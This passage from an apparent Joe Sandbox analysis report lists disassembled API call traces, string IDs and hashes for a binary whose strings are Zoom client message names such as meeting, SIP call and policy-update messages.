                  • Part of subcall function 00C8C980: __EH_prolog3.LIBCMT ref: 00C8C987
                  • Part of subcall function 00C8C980: ??0?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8C8E5,?,?,?,?,?,00000004,00C6CAA4,com.Zoom.app.meeting.cache.bytes.kv.op,0000275B,data_type), ref: 00C8C99D
                  • Part of subcall function 00C8DE55: __EH_prolog3_GS.LIBCMT ref: 00C8DE5C
                  • Part of subcall function 00C8DE55: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DE88
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEB6
                  • Part of subcall function 00C8DE55: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid,00000004), ref: 00C8DEF3
                  • Part of subcall function 00C8DE55: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result,SrcCallid,DstCallid), ref: 00C8DF23
                  • Part of subcall function 00C8DE55: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6DA61,com.zoom.app.assistant.sip.merge.call.response,Result,SrcCallid,DstCallid,com.zoom.app.assistant.sip.merge.call.response,00009CD1,Result), ref: 00C8DF8F
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$Cmm@@@CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: TroubleReason$TroubleTime$TroubleType$com.zoom.app.assistant.upload.exception.memory.log.request
                • API String ID: 3310136194-2024543588
                • Opcode ID: 9f681de1cf728dff8c2f836cafbc457e5da19c37f121e6001e1f96dd516286e7
                • Instruction ID: 19e297fe954ca281a02189b07ba15a50b555b5b6822a827e6b5fe2a09b5ba205
                • Opcode Fuzzy Hash: 9f681de1cf728dff8c2f836cafbc457e5da19c37f121e6001e1f96dd516286e7
                • Instruction Fuzzy Hash: 0DF06D70A40394BFD7107B545C5AB2A76A8E760F6DF5085A8F2456B3D1CBF08808CB75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EB07
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C6EB2C
                  • Part of subcall function 00C8C490: __EH_prolog3.LIBCMT ref: 00C8C497
                  • Part of subcall function 00C8C490: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8C3F5,?,?,?,?,?,00000004,00C6C4A4,com.Zoom.app.pt.mediaapi.response,0000274A,requestID), ref: 00C8C4AD
                  • Part of subcall function 00C8EC56: __EH_prolog3_GS.LIBCMT ref: 00C8EC5D
                  • Part of subcall function 00C8EC56: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8EC89
                  • Part of subcall function 00C8EC56: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8ECB7
                  • Part of subcall function 00C8EC56: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8ECF4
                  • Part of subcall function 00C8EC56: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName), ref: 00C8ED24
                  • Part of subcall function 00C8EC56: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID), ref: 00C8ED90
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request$deviceID$deviceType
                • API String ID: 2211999291-3402303056
                • Opcode ID: 0f2f90cb303c652d6454a1cd9ed7268b642088e4ea46d9e03ae94ba8f038de14
                • Instruction ID: 80f2777e891a9061357132765c78511fd65ad9160497aeea7c4fe107afbd194e
                • Opcode Fuzzy Hash: 0f2f90cb303c652d6454a1cd9ed7268b642088e4ea46d9e03ae94ba8f038de14
                • Instruction Fuzzy Hash: FDF030F1A402A4BFD7107B584847B2A3598A790B9AF044559B1105A3D2CBF54848977D
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70CC7
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C70CEC
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: FromApp$NeedUserConfirm$OperateType$com.Zoom.app.conf.operate.video.facility
                • API String ID: 2610200052-1513063174
                • Opcode ID: b4241be7793d69e56d3e04be4088f4137035923f2ac15c65695501a5ae2c2210
                • Instruction ID: 83fba9da464da8d3c44d051740b502f9273b9cf09e3276f501f84b0dc00b9e85
                • Opcode Fuzzy Hash: b4241be7793d69e56d3e04be4088f4137035923f2ac15c65695501a5ae2c2210
                • Instruction Fuzzy Hash: 03F02B71A403A4BBE710FB849C46F1A3264E790B1DF00C929F2416A3C1CBF44D05E338
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70DD7
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.operate.screenshare.facility,0000277C,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C70DFC
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: FromApp$NeedUserConfirm$OperateType$com.Zoom.app.conf.operate.screenshare.facility
                • API String ID: 2610200052-649132001
                • Opcode ID: dfa609529f41f6cf510d411d700c9f0bebed852023ec2471bea185e041d849f8
                • Instruction ID: 6d15da8b8204addf69478bc91f33125dd71cb2435e4a6540863fdc7852b33a4d
                • Opcode Fuzzy Hash: dfa609529f41f6cf510d411d700c9f0bebed852023ec2471bea185e041d849f8
                • Instruction Fuzzy Hash: ADF022B0640395BFD720BB054C46B2E6674EB54B09F90C92DB2806A3D2CBF48D04E774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68DF7
                • ??0?$CmmMessageTemplate_3@III@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C68E1C
                  • Part of subcall function 00C86EE0: __EH_prolog3.LIBCMT ref: 00C86EE7
                  • Part of subcall function 00C86EE0: ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C68E21,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C86EFD
                  • Part of subcall function 00C86F8D: __EH_prolog3_GS.LIBCMT ref: 00C86F94
                  • Part of subcall function 00C86F8D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C86FC0
                  • Part of subcall function 00C86F8D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C86FEE
                  • Part of subcall function 00C86F8D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C8702B
                  • Part of subcall function 00C86F8D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab), ref: 00C8705B
                  • Part of subcall function 00C86F8D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param), ref: 00C870C7
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: Param$SubTab$Tab$com.Zoom.app.conf.notifyStartSetting
                • API String ID: 2610200052-2151668039
                • Opcode ID: a9802d35e0cc301a777c30c52da14a0f685508511a58ed76d18fee47d01ffa28
                • Instruction ID: df4b61b5e0204a41be348152187e514c84fecc15a4303f06da812c9abb458371
                • Opcode Fuzzy Hash: a9802d35e0cc301a777c30c52da14a0f685508511a58ed76d18fee47d01ffa28
                • Instruction Fuzzy Hash: 3DF065F0640750EFE7106B85AC86B1AB658FB50B59F900568B2145E3C1CBF14948C775
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74D97
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.make.call.log.info,000027BA,log,enc_list,enc_type_list,00000004), ref: 00C74DBC
                  • Part of subcall function 00C88CE0: __EH_prolog3.LIBCMT ref: 00C88CE7
                  • Part of subcall function 00C88CE0: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6A291,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88CFD
                  • Part of subcall function 00C88F0D: __EH_prolog3_GS.LIBCMT ref: 00C88F14
                  • Part of subcall function 00C88F0D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F40
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F6E
                  • Part of subcall function 00C88F0D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88FAB
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value), ref: 00C88FDB
                  • Part of subcall function 00C88F0D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name), ref: 00C89047
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@
                • String ID: com.zoom.app.make.call.log.info$enc_list$enc_type_list$log
                • API String ID: 491978956-2685834041
                • Opcode ID: bcf0399bb8d98f56565e63128376e84531a5cd4af14e30382e654fbbca6f05ff
                • Instruction ID: fcbd80cc822694eaf3f9a5b23a7d85ac923bcdeb1042ce9074b83d61c69d4154
                • Opcode Fuzzy Hash: bcf0399bb8d98f56565e63128376e84531a5cd4af14e30382e654fbbca6f05ff
                • Instruction Fuzzy Hash: F6F030B06447506BD3206B949C4AB6E2164F754F59F940A28B6645A381CBF00A08E774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CDA7
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HV12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C6CDCC
                  • Part of subcall function 00C8D020: __EH_prolog3.LIBCMT ref: 00C8D027
                  • Part of subcall function 00C8D020: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6CDD1,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C8D03D
                  • Part of subcall function 00C8D100: __EH_prolog3_GS.LIBCMT ref: 00C8D107
                  • Part of subcall function 00C8D100: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C8D133
                  • Part of subcall function 00C8D100: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C8D161
                  • Part of subcall function 00C8D100: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C8D19E
                  • Part of subcall function 00C8D100: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail), ref: 00C8D1CE
                  • Part of subcall function 00C8D100: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID), ref: 00C8D23A
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: CallID$CodeDetail$FailReason$com.zoom.app.assistant.sip.callOperationFail.notification
                • API String ID: 2211999291-236660474
                • Opcode ID: 99fedbe3e6becf81c3a6b91c3c21ce527c144fd2c077a09ec88edd66cfaa5dca
                • Instruction ID: a73f8a947dedce3648f866388e58164552400bd4d8278f6e0c958acef0131f75
                • Opcode Fuzzy Hash: 99fedbe3e6becf81c3a6b91c3c21ce527c144fd2c077a09ec88edd66cfaa5dca
                • Instruction Fuzzy Hash: 54F0EDB0F44390BAE7107B848C57F2E66A8EB50F99F608028B1406A3C2CBF54C04D7B4
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70E47
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.operate.chat.facility,0000277D,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C70E6C
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: FromApp$NeedUserConfirm$OperateType$com.Zoom.app.conf.operate.chat.facility
                • API String ID: 2610200052-4010154451
                • Opcode ID: dca872517975027225bd17470f9e2ed08f01fb85f685ddbf166d040efb10bbd7
                • Instruction ID: 3f3314b7b1fd5549d56552fedccbff64fee712b827eab07df006b80072dd4302
                • Opcode Fuzzy Hash: dca872517975027225bd17470f9e2ed08f01fb85f685ddbf166d040efb10bbd7
                • Instruction Fuzzy Hash: 04F065B0648395BFDB10AB559C47B2AA664E790F19F50C538B1446A3C1C7F44904DB75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C0B7
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@II@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.framework.policy.updated,0000753A,packed_settings,config_source,policy_scene,00000004), ref: 00C6C0DB
                  • Part of subcall function 00C8BC00: __EH_prolog3.LIBCMT ref: 00C8BC07
                  • Part of subcall function 00C8BC00: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6C0E0,com.zoom.app.framework.policy.updated,0000753A,packed_settings,config_source,policy_scene,00000004), ref: 00C8BC1D
                  • Part of subcall function 00C8BCC0: __EH_prolog3_GS.LIBCMT ref: 00C8BCC7
                  • Part of subcall function 00C8BCC0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C108,com.zoom.app.framework.policy.updated), ref: 00C8BCE1
                  • Part of subcall function 00C8BCC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044), ref: 00C8BD0F
                  • Part of subcall function 00C8BCC0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C8BD4C
                  • Part of subcall function 00C8BCC0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?), ref: 00C8BD7C
                  • Part of subcall function 00C8BCC0: EnterCriticalSection.KERNEL32(00000044), ref: 00C8BDEE
                  • Part of subcall function 00C8BCC0: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C8BE0B
                Strings
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: com.zoom.app.framework.policy.updated$config_source$packed_settings$policy_scene
                • API String ID: 2152042629-843568353
                • Opcode ID: ecce5ab3db692fd944e2429ce9c47ba6edbbcfaea65abe10ca9bb6394e625ec4
                • Instruction ID: 079fe80a6263b75af5cb9dcf0451e00dcac3da3ebf6b5656e9ff1aa77158962c
                • Opcode Fuzzy Hash: ecce5ab3db692fd944e2429ce9c47ba6edbbcfaea65abe10ca9bb6394e625ec4
                • Instruction Fuzzy Hash: 3FE06872A80704BBD7007B148C8A73E36609B10B16F01802CF1141E3E2CFF88A09E7B9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C1C7
